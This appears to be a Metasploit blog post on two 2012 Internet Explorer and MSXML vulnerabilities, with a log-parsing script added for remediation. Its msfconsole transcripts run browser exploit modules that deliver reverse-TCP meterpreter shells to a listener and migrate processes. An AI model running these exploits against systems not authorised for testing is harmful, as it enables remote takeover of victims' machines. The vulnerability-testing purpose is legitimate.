We've been noticing a lot of exploit activity against Microsoft vulnerabilities lately. We decided to look into some of these attacks, and released two modules for CVE-2012-1889 and CVE-2012-1875 within a week of the vulnerabilities' publication so that our users can test their systems. Please note that both are very important to any organization using Windows, because one of them is a newly patched bug, while the other is still a zero-day. To test whether any systems on your network are vulnerable, you can download the latest version of Metasploit for free.

CVE-2012-1889: MSXML Uninitialized Memory Corruption

This is an uninitialized memory bug found in MSXML. According to Microsoft, this component can be loaded from either Internet Explorer or Microsoft Office. This vulnerability is rumored to be "state-sponsored", and what makes it really critical is that it is still a 0-day and is being used to hijack Gmail accounts. That's right: if you're using Gmail as well as Internet Explorer or Microsoft Office, you're at risk. We expect this vulnerability to grow even more dangerous since there's no patch and it's rather easy to trigger. There is a temporary mitigation from Microsoft that disables the component, along with other configuration tweaks, but obviously that has its limitations. Your best bet may be to use a different browser such as Google Chrome until an official patch is available.

Here's how you can check with Metasploit if any systems on your network are vulnerable, which is very likely since there is no patch available yet:
msf > use exploit/windows/browser/msxml_get_definition_code_exec
msf  exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(msxml_get_definition_code_exec) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf  exploit(msxml_get_definition_code_exec) > exploit
Exploit running as background job.
Started reverse handler on 10.0.1.3:4444
Using URL: http://0.0.0.0:8080/xtQdbEC7QDIb
msf  exploit(msxml_get_definition_code_exec) >
  Local IP: http://10.0.1.3:8080/xtQdbEC7QDIb
Server started.
10.0.1.79        msxml_get_definition_code_exec - Using msvcrt ROP
10.0.1.79        msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html
Sending stage (752128 bytes) to 10.0.1.79
Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.79:1565) at 2012-06-18 14:07:38 -0500
Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565) processing InitialAutoRunScript 'migrate -f'
Current server process: iexplore.exe (2856)
Spawning notepad.exe process to migrate to
[+] Migrating to 2356
[+] Successfully migrated to process

CVE-2012-1875: Internet Explorer Same ID Use-After-Free

This is a vulnerability in the way Internet Explorer handles the same ID property: a deleted object is accessed, which results in remote code execution. This has been exploited in the wild, possibly originating from Hong Kong. According to AlienVault Labs, the command-and-control (C&C) server is still active at the time of this writing. The Metasploit module shares some similarities with the exploit found in the wild: both bypass DEP/ASLR, both use msvcr71.dll, and both target common systems such as Windows XP and Windows 7. Multiple anti-virus vendors already have a quick check for this exploit. However, AVs cannot be used to patch bugs, so we still recommend you try the Metasploit module to verify whether you are indeed vulnerable.

To use this module, simply do the following:
msf > use exploit/windows/browser/ms12_037_same_id
msf  exploit(ms12_037_same_id) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms12_037_same_id) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf  exploit(ms12_037_same_id) > exploit
Exploit running as background job.
Started reverse handler on 10.0.1.3:4444
Using URL: http://0.0.0.0:8080/gTHJEKBboMi
  Local IP: http://10.0.1.3:8080/gTHJEKBboMi
Server started.
msf  exploit(ms12_037_same_id) >
10.0.1.79        ms12_037_same_id - Client requesting: /gTHJEKBboMi
10.0.1.79        ms12_037_same_id - Using msvcrt ROP
10.0.1.79        ms12_037_same_id - Sending html
Sending stage (752128 bytes) to 10.0.1.79
Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.79:1685) at 2012-06-18 13:42:49 -0500
Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685) processing InitialAutoRunScript 'migrate -f'
Current server process: iexplore.exe (3916)
Spawning notepad.exe process to migrate to
[+] Migrating to 1680
[+] Successfully migrated to process
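Once you have run either check against a range of hosts, the useful output is the list of clients that actually opened a session, since those are the machines that need the MS12-037 patch or the MSXML workaround first. The script below is an added example (it is not part of this post and not Rapid7 or Metasploit code) that parses msfconsole output like the two transcripts above into per-host findings. It assumes the session lines keep the format shown above, tolerates the "[*]"/"[+]" prefixes that msfconsole normally prints, and maps the two module names to their CVE ids in a table; the embedded log is a constructed sample copied from the transcripts.

```python
import re

# Constructed sample: lines taken from the two msfconsole transcripts above,
# embedded here so the script runs offline. Real console output carries
# "[*]" / "[+]" prefixes, which parse_sessions() strips.
SAMPLE_LOG = """\
[*] 10.0.1.79        msxml_get_definition_code_exec - Using msvcrt ROP
[*] 10.0.1.79        msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html
[*] Sending stage (752128 bytes) to 10.0.1.79
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.79:1565) at 2012-06-18 14:07:38 -0500
[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565) processing InitialAutoRunScript 'migrate -f'
[*] 10.0.1.79        ms12_037_same_id - Client requesting: /gTHJEKBboMi
[*] 10.0.1.79        ms12_037_same_id - Sending html
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.79:1685) at 2012-06-18 13:42:49 -0500
"""

# Leading "[*] ", "[+] ", "[-] ", "[!] " status markers from msfconsole.
PREFIX_RE = re.compile(r"^\[[*+!\-]\]\s*")
# "<client ip>   <module name> - <message>": which module was served to which client.
SERVED_RE = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<module>\w+) - ")
# "Meterpreter session N opened (lhost:lport -> rhost:rport) at <timestamp>"
SESSION_RE = re.compile(
    r"^Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) "
    r"at (?P<ts>.+)$"
)

# Module names used in this post, mapped to the CVE each one checks for.
MODULE_TO_CVE = {
    "msxml_get_definition_code_exec": "CVE-2012-1889",
    "ms12_037_same_id": "CVE-2012-1875",
}


def parse_sessions(log_text):
    """Return one finding per opened session: host, module, CVE, session id, time."""
    last_module = {}   # client ip -> most recent module that served it a page
    findings = []
    for raw in log_text.splitlines():
        line = PREFIX_RE.sub("", raw.strip())
        served = SERVED_RE.match(line)
        if served:
            last_module[served["ip"]] = served["module"]
            continue
        opened = SESSION_RE.match(line)
        if opened:
            # Attribute the session to the module that most recently served this client.
            module = last_module.get(opened["rhost"], "unknown")
            findings.append({
                "host": opened["rhost"],
                "module": module,
                "cve": MODULE_TO_CVE.get(module, "unmapped"),
                "session": int(opened["sid"]),
                "opened_at": opened["ts"],
            })
    return findings


def vulnerable_hosts(findings):
    """Deduplicated, sorted (host, CVE) pairs: the remediation list."""
    return sorted({(f["host"], f["cve"]) for f in findings})


if __name__ == "__main__":
    results = parse_sessions(SAMPLE_LOG)
    for f in results:
        print(f"{f['host']}  {f['cve']}  via {f['module']}  (session {f['session']}, {f['opened_at']})")
    print("needs remediation:", vulnerable_hosts(results))
```

Feed it a saved console log (for example, msfconsole's spool output) and the remediation list comes out as (host, CVE) pairs; a host that never opened a session against either module simply does not appear, which is exactly the "not vulnerable to this check" case.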

If you have any questions, let us know in the comments section. To obtain the latest version of Metasploit for free, please go to: http://www.metasploit.com/download/
